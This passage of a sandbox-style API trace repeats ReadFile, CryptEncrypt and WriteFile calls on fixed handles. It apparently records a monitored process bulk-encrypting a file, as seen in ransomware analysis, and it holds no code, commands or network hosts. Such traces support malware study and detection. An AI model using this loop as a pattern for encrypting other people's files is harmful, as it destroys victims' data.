pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.437] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.437] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.437] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.438] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.438] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.438] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.438] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.438] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.438] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.439] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.439] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.439] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.439] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.440] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.440] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.440] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.440] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.440] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.440] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.441] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.441] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.441] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.441] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.441] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.442] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.442] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.442] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.442] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.442] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.443] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.443] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.443] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.443] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.443] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.444] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.491] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.492] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 